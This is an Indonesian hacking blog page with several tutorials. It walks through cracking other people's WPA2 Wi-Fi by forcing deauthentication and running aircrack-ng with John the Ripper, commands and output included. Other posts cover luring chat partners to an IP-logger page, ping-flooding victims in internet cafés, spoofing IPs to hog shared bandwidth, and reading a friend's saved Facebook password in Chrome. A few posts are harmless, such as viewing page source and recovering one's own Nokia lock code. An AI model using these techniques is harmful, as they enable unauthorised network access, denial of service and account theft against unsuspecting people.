Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Senin, 14 Januari 2013

Jebol Password WIFI

Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Download BackTrack 5
Download Wordlist John The Ripper Disini:
Download Wordlist
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)
Wireless Hacking Using BackTrack 5
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#


5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Share:

Hack Komputer Via IP

Ada beberapa yang perlu disiapkan yaitu:
  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.
Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html
Cara yang dipakai disini adalah:
  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html
Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.
Maka, jreeengggggg.. kita lihat hasilnya. Itulah dia IP lawan chatting kita di Facebook.
Share:

Cara Melihat Source Code Protected Website

Kali ini saya tutorial sederhana tentang cara melihat source code web yang di proteksi oleh Anti Klik Kanan dan Anti CTRL+U, kebetulan saya menggunakan Mozilla Firefox sebagai browser.
Anti Klik Kanan - Protected Website
Contohnya adalah halaman deface’annya orang, nah saya pengen tau keindahan source code orang itu, mari kita lanjutkan:
anonk7 1
Langkahnya:
1. Klik Tools -> Web Developer -> Page Source
Anonk7 2
2. Udah kelihatan tuh source code + biang kerok anti klik kanannya!
AnonK7 3
Mudah mudahan tutorial sederhana kali ini berkenan di hati agan agan dan bermanfaat untuk pembelajaran.

source :: BinusHacker
Share:

DOS Attack 2013

Saya akan membahas tentang DoS PingFlood.

Apakah DoS PingFlood itu?
Software ini hanya dijalankan di Windows dan menggunakan System PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat.
Korban yang terserang DSPF (sebut saja DoS PingFlood) akan mengalami peningkatan jaringan Traffic yang penuh
DoS Ping Flood adalah aplikasi yang dioperasikan pada sistem operasi windows. Buat yang belum mengetahui apa itu DDoS Attack silakan baca dulu artikel saya Denial Of Service | Attack . Ping flood menggunakan metode ping dan mengunakan protokol ICMP, tetapi dalam paket dengan jumlah yang sangat banyak serta sangat cepat pengirimannya. Ping flood dibuat oleh www.loranbase.com pada tanggan 1 Februari 2007. Versi yang saya share-kan saat ini adalah versi v1.0. Penggunaan ping flood harus pada sistem operasi windows karena aplikasi ping flood merupakan executable ( berekstensi .exe )
Korban dari ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan komputer penuh.
Aplikasi ping sendiri aslinya digunakan untuk mengecek apakah sebuah host di jaringan komputer aktif atau tidak. Tetapi jika paket yang dikirim untuk ping jumlahnya terlalu banyak, maka hal ini dapat termasuk dalam katagori DDoS Attack.
Baiklah langsung saja, pertama download dulu aplikasi Ping Flood V.1.0 berikut:
DOWNLOAD PINGFLOOD TOOLS 
Password : infoduniaku
* Persiapan serangan
- Modem / Router
- Komputer dengan OS Windows ( XP, Vista, 7 )
- Aplikasi Ping flood yang didownload tadi
- Putty untuk remote / Linux
- Command Prompt Windows
- Korban / Target yang memiliki security LOW
* Instalasi PingFlood
  1. Ekstrak file pingflood yang didownload tadi.
  2. Copy aplikasi pingflood tersebut kedalam hardisk derektori Windows C:\WINDOWS. Ingat copy hanya aplikasi ping flood.exe saja bukan foldernya.
  3. Setelah pengcopian selesai cek apakah aplikasi tersebut sudah bisa digunakan. Caranya aktifkan Command Prompt dengan klik start > run > tulis cmd. Selanjutnya ketik pingflood pada Command Promp, jika berhasil maka akan ada tampilan seperti ini :
Format perintah dari ping flood:  pingflood.exe <victim> [option]
  • Pingflood.exe artinya mengaktifkan aplikasi ping flood
  • <victim> artinya IP address atau domain website yang akan dijadikan korban
  • [option] adalah opsi tertentu jika ingin mengirim paket DoS ping flood dengan ukuran, jumlah dan delay tertentu.
Contoh :
pingflood 192.168.1.3 -n 100 -d 50 -s 15000
Penjelasan :
  • pingflood,  artinya mengaktifkan aplikasi ping flood.
  • 192.168.1.3, adalah IP korban yang akan diserang menggunakan ping flood.
  • -n, artinya jumlah paket yang berjumlah 100.
  • -d, artinya delay tiap pengiriman paket.
  • -s 15000, artinya ukuran data yang dikirim sebesar 15000 bytes.
* Praktek Serangan
Saya asumsikan kalian telah mengetahui IP address korban yang akan kalian serang sebagai contoh (192.168.3.1). Saya misalkan IP nya adalah 192.168.3.1. Kalian bisa mencobanya di dalam sebuah warnet, kerana dengan mudah kalian bisa mengetahui IP pengguna lain didalam satu warnet. Kalian bisa gunakan Tools seperti IP Scanner ataupun Net Tools.
- Aktifkan Command Prompt klik start > run > tulis cmd
- Lakukan pengujian ping ke modem korban, caranya ketik ping 192.168.3.1
Pengujian diatas menunjukan pengujian ping berhasil dan keadaan normal tidak ada paket yang loss. Rata-rata waktu tempuh 0 mili second.
- Sekarang coba Ping flood ke korban caranya :
Ketik pada command Prompt pingflood 192.168.3.1
Akan terlihat perbedaan yang sangat segnifikan antara keadaan normal dengan keadaan pada saat melakukan ping flood atau serangan DDoS tersebut. Kalian bisa lihat perbedaannya pada saat melakukan ping flood selama lebih kurang 1-3 menit lakukan ping ke modem korban, maka kalian akan melihat banyaknya jumlah paket yang loss. selama itu ping tersebut komputer korban akan dibanjiri kiriman paket data sehingga komputer korban tidak bisa beroperasi seperti normalnya.
NB : Cara ini sebaiknya dijadikan sebagai pembelajaran saja, saya tidak akan bertanggung jawab atas penyalah gunaan cara diatas
Share:

Pembuka Kunci HP

Pada postingan ini saya akan berbagi pengalaman ketika saya lupa Lock Code Handphone / Kode Kunci Handphone dan saya ingin melakukan Unlock Handphone pada saat ingin kembali ke pengaturan awal Handphone, saya lebih familiar menyebutnya Reset Handphone atau Soft Reset HP atau Unlock Code Handphone.

Mungkin diantara kalian ada yang pernah mengalami atau malah sedang mengalaminya. Saya sudah coba pakai “PHONE LOCK” UNLOCKER FOR NOKIA BB5, NOKIA MASTER CODE, WorldUnlock Kalkulatordan berbagai cara dari pakai program sampai pakai tools online tidak ada yang berhasil satupun ;) . Kalau dibawa ke counter pasti makan waktu, nambah biaya lagi, yang paling parah pasti diflash  ulang dan konsekuensinya data pasti hilang. OK, tidak usah panjang lebar langsung ke topik pembicaraan. Oh ya saya lupa, di sini saya menggunakan Hand Phone Nokia 5320 Express Music.
  • Download dan Install NSS (Nemesis Service Suite)di sini saya menggunakan Nemesis Service Suite Beta 1.0.38.15. Bisa di download disini:

    Download Tools Lock Code Handphone
  • Hubungkan HandPhone kalian dengan mode PC Suite pada Komputer/Notebook/Netbook menggunakan kabel data.
  • Buka aplikasi NSS-nya.
  • Kemudian klik pada button “Scan for new device” di pojok kanan atas.
  •  Pada menu utama silahkan klik pada tab Phone Info.
  • Jika Hand Phone belum terdeteksi silahkan klik button “Scan”.
  • Setelah HandPhone sudah terdeteksi kemudian klik pada tab “Permanent Memory”.
  • Pada menu “Permanent Memory” silahkan klik pada button “Read”. Tunggu sampai proses “Read” selesai.
  • Setelah proses “Read” selesai, silahkan buka Windows Explore kemudian masuk ke direktori :
    C:\Program Files\NSS\Backup\pm

  • Kemudian cari file yang menggunakan ekstensi *.pm
  • Buka File tersebut menggunakan notepad atau wordpad atau program pengolah kata lainnya kesukaan kalian. Saya sarankan pakai notepad atau wordpad untuk mempermudah pencarian.

  • Scroll sampai kalian menemukan baris [308].
  • Cari angka yang menggunakan angka tiga (3) sebagai pemisah.
    Contoh :  5=35333230300000000000

  • Jika sudah ketemu silahkan hapus sepuluh digit angka nol (0yang berderet dibelakang.
    Contoh di atas akan menjadi 3533323030

  • Kemudian hapus angka tiga (3) mulai dari depan ke belakang dengan jarak satu angka.
    Contoh di atas akan menjadi 53200

  • Nah, angka terakhir itulah yang menjadi Lock Code / Kode Kuci HandPhone kalian.
    Lock code Hand Phone saya adalah 53200

Artikel ini sudah tested di (Nokia 5320 Xpress Music), yang lain belum di test. Boleh dicoba ke HandPhone yang lain, klo berhasil jangan lupa comment dibawah ya.
buka kode kunci handphone - lock code handphone
Share:

Kamis, 10 Januari 2013

Cara Cepat Undang teman ke fan page

tentang cara mengundang teman ke fan page,tinggal centang-centang selesai deh,tapi,bagaimana jika teman facebook sobat lebih dari 500 atau 1000? pastinya butuh waktu seharian kan untuk mencentang dan mengundang mereka satu-satu? nah kali ini X-RNJ punya solusinya sobat, bisa dipraktekkan di Mozila maupun google chrome nih jadi gausah khawatir ya sobat,hehehe,oke dah langung aja dari pada bnayak bicara,nah kali ini saya akan memberi tutorial lewat mozila nih,bagi yang ingin mempraktekannya di Google Chrome,

Untuk Mozila Firefox  :
1.) Mulai Firefox 6 atau lebih baru.
2.) Buka halaman penggemar/Fan Page facebook sobat.
3.) Pada Bagian Panel Admin , Klik Kembangkan Pemirsa > Undang Teman ( biasanya berada di bagian atas tampilan fanpage )





4.) Ganti interaksi terbaru dengan cari semua teman dan scrool ke bawah, sehingga semua teman-teman Anda dimuat

5.) Tekan Ctrl + Shift + K  Nanti sebuah panel firefox akan dibuka di bagian atas halaman, di sini Anda dapat menempatkan kode javascript :




Kode ini akan memilih teman masing-masing dan melakukan klik di atasnya.( laporkan jika kode ini sudah tidak berfungsi )


8.) Lalu tekan Enter
9.) Lalu tunggu facebook mencentang semua teman sobat (Ini bisa memakan waktu beberapa saat tergantung kecepatan komputer sobat.).
10.) Terakhir, jika semua telah tercentang,klik Submit / Kirim
Share:

Hack Koneksi Warnet




 Cara Hacking Koneksi Warnet


1. Buka icon network di taskbar (deket jam yang nyala2 itu, wah gw harap km tau apa yg gw sebutin)
2. Klik kanan Status, di General pilih Properties, lanjut dgn TCP/IP .
3. Misalnya aja disitu IP nya yg paling atas 192.168.0.22 , asumsinya km dikomputer 22 (biasanya warnet me nomori IP berdasar PC biar ga bingung)
4. kamu ganti aja 22 itu jadi nomor acak, yang paling 100 keatas 120 kek atau 122, ingat ip juga ada batasan sampe 255 dan ga mungkin warnet sampe 255 komputer. Jangan sampe bentrok dengan Komputer lain ya. Kalo udah ganti klik ok dan close.
5. Silahkan km browsing + download sepuasmu, komputer tetanggamu mungkin akan menggerutu karena tiba2 lambat, atau bs juga si OP kena musibah lambat jg. kalau main game, wah ga ada lagnya karena semua abis disedot kamu.
6. kalau mau off, balikin ke IP semula, soalnya kalau ip nya ga cocok pas close billing gak bisa!! (kadang)

cara ini berfungsi baik kalo :
1. Tiap IP sudah dibatasi koneksinya oleh router software
2. Tidak dikunci oleh IT pada bagian properties tadi

Tidak direkomendasikan :
1. Buat OP warnet!! kasian User!!

Dosa di tanggung masing-masing, ok sob..   :-)

Share:

Hack password FB teman dengan Google Chrome


Penasaran alias pengen tahu password Facebook teman Anda ? trik rahasia cara mengetahui password atau kata sandi facebook teman berikut ini mungkin adalah cara paling jitu dan paling dahsyat,,!! untuk mendapatkannya dengan menggunakan Browser Google Chrome.
Syaratnya adalah:
1. Anjurkan teman Anda untuk Login/masuk ke Facebooknya dengan menggunakan browser Google Chrome.
2.Ketika teman Anda sudah akan selesai mengetikan username danpassword,JANGAN LUPA CENTANG ”BIARKAN SAYA TETAP MASUK” sebelum dia Login.
3. Lalu biarkanlah teman Anda berfacebookan ria.
Naah inilah triknya jika ingin mengetahui passwordnya
cara-nya adalah:
1. Masuk Google Chrome lalu klik tombol/icon Obeng ( terletak pada Pojok kanan Atas) 
2. Lalu klik “PILIHAN”
3. Lalu klik “Tampilakan Sandi yang di simpan” seperti gambar di bawah
Hack Password FB teman dengan Google chrome
  4. Di situlah kita dapat melihat semua password dan dari situs mana saja kita login. Termasuk teman Anda 
Share: